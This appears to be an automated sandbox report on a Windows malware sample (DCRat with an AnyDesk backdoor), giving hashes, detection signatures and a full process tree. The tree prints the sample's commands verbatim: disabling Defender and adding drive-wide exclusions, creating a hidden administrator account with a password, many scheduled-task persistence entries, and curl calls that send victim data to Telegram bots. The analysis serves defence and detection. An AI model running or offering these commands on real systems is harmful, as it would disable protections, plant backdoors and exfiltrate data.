Analysis
-
max time kernel
153s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
09-11-2022 11:26
General
-
Target
migrate.120.exe
-
Size
15.7MB
-
MD5
b27e540aef37c99f3cfd2766c2e61784
-
SHA1
c516b74daec17d1bc788c54433cf10899ee07e92
-
SHA256
28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
-
SHA512
641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
-
SSDEEP
393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX
Malware Config
Extracted
https://ipinfo.io/ip
Signatures
-
DCRat payload 14 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 13 IoCs
-
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 22 IoCs
-
Possible privilege escalation attempt 11 IoCs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 11 IoCs
-
Adds Run key to start application 2 TTPs 24 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 12 IoCs
-
Drops file in Windows directory 25 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 39 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 11 IoCs
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 21 IoCs
-
Modifies registry class 63 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 10 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\migrate.120.exe"C:\Users\Admin\AppData\Local\Temp\migrate.120.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\programdata\1.exe"C:\programdata\1.exe" /D2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /i "Platform"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\tasks4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
\??\c:\programdata\migrate.exec:\programdata\migrate.exe -p44324⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "5⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic" start WMService6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5484 -s 4407⤵
- Program crash
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 2 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net.exenet start WMService6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start WMService7⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 60 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .4⤵
-
C:\Windows\SysWOW64\findstr.exeFindStr .5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC CPU Get Name /Value5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost Path Win32_VideoController Get Name /Value5⤵
-
C:\Windows\SysWOW64\find.exeFIND.EXE "="5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="IYMUGYHLCORE2Intel Core Processor (Broadwell)Microsoft Basic Display AdapterSERVICE WMService RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"4⤵
- Executes dropped EXE
-
C:\programdata\any.exe"C:\programdata\any.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\net.exenet stop TaskSc4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskSc5⤵
-
C:\Windows\SysWOW64\net.exenet stop TaskScs4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskScs5⤵
-
C:\Windows\SysWOW64\net.exenet stop AnyDesk4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AnyDesk5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM anydesk.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wininit1.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent5⤵
-
C:\ProgramData\wsappz.exeC:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent6⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c echo Pass325524⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Pass325525⤵
-
C:\ProgramData\AnyDesk\AnyDesk.exeC:\ProgramData\AnyDesk\anydesk.exe --set-password4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id5⤵
-
C:\ProgramData\AnyDesk\AnyDesk.exeC:\ProgramData\AnyDesk\anydesk.exe --get-id6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c find /n /v ""4⤵
-
C:\Windows\SysWOW64\find.exefind /n /v ""5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(new-object System.Net.WebClient).DownloadString('https://ipinfo.io/ip')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c find /n /v ""4⤵
-
C:\Windows\SysWOW64\find.exefind /n /v ""5⤵
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="ANY_IYMUGYHL'id:'"367103419"'ip:'"154.61.71.51"" "https://api.telegram.org/bot"5513453963:AAEqmVGigjirKuykDiL7YHcdVrBQ72q07Ss"/sendMessage"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet user oldadministrator "Pass32552" /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user oldadministrator "Pass32552" /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators oldadministrator /ADD4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators oldadministrator /ADD5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administradores oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administradores oldadministrator /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administratoren oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administratoren oldadministrator /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administrateurs oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrateurs oldadministrator /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup администраторы oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup администраторы oldadministrator /add5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f4⤵
-
C:\programdata\dc.exe"C:\programdata\dc.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\runtimeMonitor\PsYm20I.bat" "4⤵
-
C:\runtimeMonitor\ComdriverSvc.exe"C:\runtimeMonitor\ComdriverSvc.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7peWjKJuHe.bat"6⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
-
C:\Program Files\Windows Mail\RuntimeBroker.exe"C:\Program Files\Windows Mail\RuntimeBroker.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\odt\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\odt\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 8 /tr "'C:\odt\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Public\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\Lang\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\7-Zip\Lang\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\odt\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\odt\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\odt\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Templates\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --service1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\odt\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --control1⤵
